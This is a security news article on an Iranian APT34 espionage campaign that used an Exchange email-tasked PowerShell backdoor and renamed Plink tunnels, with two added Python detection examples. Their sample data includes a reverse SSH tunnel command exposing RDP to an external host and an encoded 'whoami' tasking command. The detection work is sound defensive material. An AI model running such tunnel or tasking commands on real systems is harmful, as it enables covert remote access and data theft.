Iran Traps Middle East Nation in 8-Month Espionage Campaign
APT34 Used Microsoft Exchange Server to Send Email Commands to Backdoor Malware
Iranian state-sponsored hackers conducted an eight-month espionage campaign against a Middle Eastern government, compromising dozens of computers between February and September.
Crambus, also known as APT34, OilRig or Helix Kitten, combined publicly available tools with three previously undocumented pieces of malware to gain access to systems, maintain persistence and steal data, security researchers at Symantec wrote.
"The attackers stole files and passwords and, in one case, installed a PowerShell backdoor that was used to monitor incoming mails sent from an Exchange Server in order to execute commands sent by the attackers in the form of emails, and surreptitiously forwarded results to the attackers," according to the Symantec Threat Hunter Team, part of Broadcom.
The PowerShell backdoor, which Symantec tracks as Backdoor.PowerExchange, logged into a Microsoft Exchange server with hard-coded credentials to receive its commands by email. It scanned the mailbox for messages with "@@" in the subject line, decoded the command each one carried, executed it and then deleted the message. According to FortiGuard, APT34 first used the PowerExchange backdoor in 2022 against a government organization in the United Arab Emirates.
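The tasking channel described above leaves a recognizable trail in mailbox audit data even when the backdoor itself is never recovered: a message with the marker in its subject is read, the mailbox hard-deletes it minutes later, and the same mailbox sends mail to an address outside the organization. The following detection logic is an added example, not code from the article, Symantec or the malware; the record layout, operation names, the org domain and the assumption that the command body is base64-encoded text are all constructed for the example.

```python
# Added example: flag the observable side effects of an email-tasked backdoor
# in mailbox audit records. Not Symantec's code and not the malware itself.
# Assumptions (constructed for this example): the MailEvent layout, the
# operation vocabulary "Read"/"HardDelete"/"Send", the org domain, and that
# the tasking body is base64-encoded printable ASCII.
import base64
import binascii
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, Optional


@dataclass
class MailEvent:
    ts: datetime
    mailbox: str                 # mailbox the operation ran against
    op: str                      # "Read", "HardDelete" or "Send" (constructed vocabulary)
    subject: str
    body: str = ""               # populated for Read events in this sample
    recipients: List[str] = field(default_factory=list)


def decode_command(body: str) -> Optional[str]:
    """Return the command text if body is base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or not raw.isascii():
        return None
    text = raw.decode("ascii")
    return text if text.isprintable() else None


def find_mail_c2(events: List[MailEvent], marker: str = "@@",
                 org_domain: str = "gov.example",
                 window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Flag a Read of a marker-tagged message when at least two of three indicators
    follow: the body decodes to a command, the message is hard-deleted within the
    window, and the mailbox sends to an address outside org_domain within the window."""
    events = sorted(events, key=lambda e: e.ts)
    findings = []
    for i, ev in enumerate(events):
        if ev.op != "Read" or marker not in ev.subject:
            continue
        later = [x for x in events[i + 1:]
                 if x.mailbox == ev.mailbox and x.ts - ev.ts <= window]
        deleted = any(x.op == "HardDelete" and x.subject == ev.subject for x in later)
        external = [r for x in later if x.op == "Send" for r in x.recipients
                    if not r.lower().endswith("@" + org_domain)]
        command = decode_command(ev.body)
        if sum([command is not None, deleted, bool(external)]) >= 2:
            findings.append({
                "ts": ev.ts, "mailbox": ev.mailbox, "subject": ev.subject,
                "command": command, "deleted": deleted,
                "external_recipients": external,
            })
    return findings


# Constructed sample: one tasking sequence plus two benign look-alikes.
T0 = datetime(2023, 7, 12, 9, 0, 0)
SAMPLE_EVENTS = [
    MailEvent(T0, "svc-mail@gov.example", "Read", "@@ status",
              base64.b64encode(b"whoami /all").decode()),
    MailEvent(T0 + timedelta(seconds=20), "svc-mail@gov.example", "HardDelete", "@@ status"),
    MailEvent(T0 + timedelta(seconds=45), "svc-mail@gov.example", "Send", "Re: status",
              recipients=["ops@mail-relay.example"]),
    # Benign: read and deleted, but no marker in the subject.
    MailEvent(T0 + timedelta(minutes=30), "alice@gov.example", "Read", "Weekly digest", "Hello team"),
    MailEvent(T0 + timedelta(minutes=31), "alice@gov.example", "HardDelete", "Weekly digest"),
    # Benign: marker-like subject, plain-text body, internal reply, never deleted.
    MailEvent(T0 + timedelta(hours=1), "bob@gov.example", "Read", "Coffee @@ 10?", "See you there"),
    MailEvent(T0 + timedelta(hours=1, minutes=2), "bob@gov.example", "Send", "Re: Coffee @@ 10?",
              recipients=["alice@gov.example"]),
]

if __name__ == "__main__":
    for hit in find_mail_c2(SAMPLE_EVENTS):
        print(hit)
```

Requiring two of the three indicators keeps an ordinary "@@" in a subject line from firing on its own; a real deployment would read the events from Exchange mailbox audit logging rather than the inline list, and the decoder would be swapped for whatever encoding the sample under analysis actually uses.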
Crambus also used Plink, the publicly available command-line SSH client from the PuTTY suite, to configure port-forwarding rules that gave the attackers Remote Desktop Protocol access to compromised computers through an SSH tunnel. Dick O'Brien, principal intelligence analyst for the Symantec Threat Hunter Team, told Information Security Media Group that Crambus had used Plink in previous campaigns and that the tool's presence helped attribute this campaign to the Iranian group.
Although the attackers gained initial access in February, they did not install the PowerShell backdoor for long-term persistence until July. Throughout the intrusion they repeatedly ran Plink and executed malicious code, until Symantec researchers detected potentially malicious use of the tool and disrupted the operation.
Researchers have long associated Crambus with cyberespionage operations primarily targeting Middle Eastern and West Asian countries, including Saudi Arabia, Israel, the United Arab Emirates, Iraq, Jordan, Lebanon, Kuwait and Qatar. The group first appeared in 2014 and by 2019 it had deployed many malicious tools, including more than 100 web shells for creating backdoors and communicating with compromised systems (see: Despite Doxing, OilRig APT Group Remains a Threat).
According to Mandiant, APT34 conducts reconnaissance operations that serve Iranian nation-state interests; its pursuit of information that references Iran and its use of Iranian infrastructure support that attribution. CrowdStrike said the group has primarily targeted the aviation, energy, financial, government and hospitality sectors.
The Symantec Threat Hunter Team said the attackers used the Mimikatz credential-dumping tool and an information stealer, Infostealer.Clipog, to harvest credentials and compromise computers on the targeted Middle Eastern entity's network.
After gaining access to a computer, the attackers used a renamed copy of Plink to establish remote access and ran a netstat command to enumerate all of the host's TCP and UDP connections.
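Renaming Plink defeats a detection keyed on the file name, but not one keyed on what the process does: the PE's original file name, the SSH port-forwarding arguments, and the netstat enumeration that follows on the same host are all visible in process-creation telemetry. The detection below, covering both the Plink tunneling described earlier and the renamed-Plink-plus-netstat sequence in this paragraph, is an added example and not code from the article, Symantec or the PuTTY project. The ProcEvent fields mirror what a Sysmon process-creation event carries (Image, OriginalFileName, CommandLine), but the records, hostnames, addresses and password are constructed; the Plink flags (-N, -R, -L, -pw, -batch, -ssh, -hostkey) are real Plink options.

```python
# Added example: spot a renamed Plink used as an SSH tunnel for RDP, then a
# netstat sweep from the same host. Not Symantec's or the PuTTY project's code.
# Assumptions (constructed): the ProcEvent layout and every sample record.
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Plink forwarding spec: [listen-addr:]listen-port:target-host:target-port
# (IPv6 literals with embedded colons are not handled by this simple pattern).
FORWARD_RE = re.compile(r"^(?:(?P<bind>[^:]+):)?(?P<lport>\d+):(?P<host>[^:]+):(?P<rport>\d+)$")
FORWARD_FLAGS = {"-R", "-L"}                         # remote / local port forward
PLINK_ONLY_FLAGS = {"-pw", "-hostkey", "-batch", "-ssh"}  # characteristic of Plink's CLI
RDP_PORT = 3389


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    image: str               # full path of the executable that ran
    original_file_name: str  # OriginalFileName from the PE version resource
    cmdline: str


def parse_forwards(cmdline: str) -> List[Tuple[str, int, str, int]]:
    """Return (flag, listen_port, target_host, target_port) for each -R/-L on the command line."""
    argv = cmdline.split()
    forwards = []
    for i, tok in enumerate(argv):
        if tok in FORWARD_FLAGS and i + 1 < len(argv):
            m = FORWARD_RE.match(argv[i + 1])
            if m:
                forwards.append((tok, int(m["lport"]), m["host"], int(m["rport"])))
    return forwards


def looks_like_plink(ev: ProcEvent) -> bool:
    """Match on PE metadata, or on Plink's CLI shape when the metadata has been stripped."""
    argv = set(ev.cmdline.split())
    by_metadata = ev.original_file_name.lower() == "plink"
    by_args = bool(argv & PLINK_ONLY_FLAGS) and ("-N" in argv or bool(parse_forwards(ev.cmdline)))
    return by_metadata or by_args


def find_plink_tunnels(events: List[ProcEvent],
                       window: timedelta = timedelta(minutes=30)) -> List[Dict]:
    """One finding per Plink execution, annotated with the three indicators from the text:
    renamed binary, a forward touching RDP, and a netstat run on the same host soon after."""
    events = sorted(events, key=lambda e: e.ts)
    findings = []
    for i, ev in enumerate(events):
        if not looks_like_plink(ev):
            continue
        basename = ev.image.replace("\\", "/").rsplit("/", 1)[-1].lower()
        forwards = parse_forwards(ev.cmdline)
        netstat_after = any(
            x.host == ev.host and x.ts - ev.ts <= window and x.image.lower().endswith("netstat.exe")
            for x in events[i + 1:])
        findings.append({
            "ts": ev.ts, "host": ev.host, "image": ev.image,
            "renamed": basename != "plink.exe",
            "forwards": forwards,
            "exposes_rdp": any(RDP_PORT in (f[1], f[3]) for f in forwards),
            "followed_by_netstat": netstat_after,
        })
    return findings


def triage(findings: List[Dict]) -> List[Dict]:
    """Keep only the high-confidence pattern: renamed Plink whose forward involves RDP."""
    return [f for f in findings if f["renamed"] and f["exposes_rdp"]]


# Constructed sample: the intrusion pattern, a legitimate admin use of Plink, and noise.
T0 = datetime(2023, 7, 3, 22, 14, 0)
SAMPLE_EVENTS = [
    ProcEvent(T0, "FILESRV01", r"C:\Windows\Temp\svchost.exe", "Plink",
              r"C:\Windows\Temp\svchost.exe -N -R 8443:127.0.0.1:3389 -pw Passw0rd! -batch user@203.0.113.45"),
    ProcEvent(T0 + timedelta(seconds=40), "FILESRV01", r"C:\Windows\System32\NETSTAT.EXE",
              "netstat.exe", "netstat -ano"),
    ProcEvent(T0 + timedelta(hours=2), "ADMIN-WS", r"C:\Program Files\PuTTY\plink.exe", "Plink",
              "plink.exe -ssh -L 2222:10.0.0.5:22 admin@bastion.corp.example"),
    ProcEvent(T0 + timedelta(hours=3), "ADMIN-WS", r"C:\Windows\System32\cmd.exe", "Cmd.Exe", "cmd /c dir"),
]

if __name__ == "__main__":
    for hit in triage(find_plink_tunnels(SAMPLE_EVENTS)):
        print(hit)
```

The first record is what the article describes: a copy of Plink masquerading as svchost.exe in a temp directory, exposing the host's RDP port to an external address over a reverse tunnel, with netstat run seconds later. The administrator's genuine plink.exe forwarding SSH to a bastion is reported but dropped by triage, which is the point of keying on behaviour rather than on the file name alone.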
Cybersecurity company Trend Micro in September attributed to APT34 a cyberespionage operation that used a novel malware - dubbed Menorah - to target a Saudi Arabian entity. The malware could identify a compromised machine, read and upload files from the machine, and download additional files, revealing the espionage group's range of tools and technical capability to deploy custom tools based on its objectives.
"APT34 demonstrates their vast resources and varied skills, and will likely persist in customizing routines and social engineering techniques to use per targeted organization to ensure success in intrusions, stealth and cyberespionage," Trend Micro said.